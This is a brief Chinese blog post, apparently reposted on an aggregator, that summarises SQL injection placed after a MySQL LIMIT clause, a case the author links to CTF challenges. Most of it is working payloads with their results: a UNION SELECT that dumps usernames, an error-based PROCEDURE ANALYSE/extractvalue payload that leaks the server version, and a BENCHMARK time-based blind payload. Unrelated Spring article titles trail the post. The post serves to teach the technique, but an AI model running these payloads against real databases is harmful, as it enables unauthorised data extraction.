小结--limit注入
Posted spark-xl
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了小结--limit注入相关的知识,希望对你有一定的参考价值。
0x01总结一下
这种类型一般实际情况中在参数为start返回一些结果变量的时候,或者其他一些情况,在ctf中也比较多
没有order by
可以跟union select 进行查询
mysql> select user from users limit 0,1 union select user from users;
+-------+
| user |
+-------+
| admin |
| test |
| sp4rk |
| qwer |
+-------+有 order by
这里具体原理可以参考文章 Mysql注入点在limit关键字后面的利用方法
mysql> select user from users order by user_id limit 0,4 procedure analyse(extractvalue(1,concat(0x5e24,version(),0x5e24)),1);
ERROR 1105 (HY000): XPATH syntax error: '^$5.5.53^$'
基于时间
select user from users order by user_id limit 0,4 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(5,SHA1(1)),1))))),1);
不知道为什么我这里并没有延时....以上是关于小结--limit注入的主要内容,如果未能解决你的问题,请参考以下文章
初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段
初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段